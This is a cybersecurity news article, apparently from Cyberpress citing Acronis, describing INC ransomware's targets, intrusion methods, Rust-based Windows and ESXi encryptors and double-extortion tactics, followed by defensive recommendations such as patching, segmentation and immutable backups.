The cybersecurity landscape faces a growing threat from INC ransomware, a highly active Ransomware-as-a-Service (RaaS) group that has claimed over 800 victims globally since its emergence in mid-2023.
Known for its aggressive double-extortion tactics, INC primarily targets high-profile organizations in the United States, specifically focusing on the legal, manufacturing, technology, and healthcare sectors.
The group’s rapid evolution has recently culminated in sophisticated Rust-based payloads capable of compromising both Windows and Linux/ESXi environments.
INC Ransomware Exfiltrates Data
INC affiliates rely on diverse methods to breach corporate networks.
Initial access is typically achieved through spear-phishing campaigns, the purchase of credentials from initial access brokers, or the exploitation of known vulnerabilities in public-facing applications.
Target systems often include those affected by Citrix NetScaler (CVE-2023-3519), Fortinet EMS (CVE-2023-48788), and Citrix Bleed 2 (CVE-2025-5777).
Once inside the network, the attackers use standard command-line tools and IP scanners to quietly map the environment.
To escalate privileges, the group deploys a highly customized Base64-encoded PowerShell script that dumps sensitive credentials directly from Veeam backup servers.
This specialized tool utilizes salted Data Protection API (DPAPI) decryption routines to extract administrative passwords, giving the attackers deep control over the victim’s infrastructure.
The group’s technical sophistication is evident in its ransomware payloads, which have been entirely rewritten in Rust.
This modern approach complicates reverse engineering while enabling seamless cross-platform attacks. On Windows systems, the malware uses multithreading and a tiered, partial-encryption routine to speed up the destruction process drastically.
It actively avoids critical system files so the machine remains functional enough to display ransom notes on the desktop and physically print extortion demands on network printers.
The group also utilizes a dual-site extortion strategy, maintaining a private portal for ransom negotiations and a public leak site to punish uncooperative victims, acronis said.
On Linux and VMware ESXi servers, the payload is equally destructive. The malware uses built-in VMware management commands to shut down all running virtual machines before systematically encrypting them.
This ensures no crucial files are locked by the hypervisor, allowing for maximum data destruction across the virtualized environment.
Both the Windows and Linux payloads use advanced, hybrid encryption schemes that combine Curve25519 Elliptic Curve Cryptography and AES-128.
Defending against the INC ransomware requires a proactive, layered security strategy. Organizations must prioritize patching public-facing vulnerabilities and securing remote access points with robust multi-factor authentication.
Implementing strict network segmentation and limiting outbound traffic can disrupt the attackers’ use of RMM tools and rclone for data exfiltration.
Furthermore, deploying advanced endpoint protection with anti-tamper capabilities is essential to block the group’s tactics to impair defenses.
Finally, maintaining offline, immutable backups ensures that even if a network is fully encrypted, the organization can restore its critical operations without bowing to the group’s costly extortion demands.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.
Click Here For The Original Source.
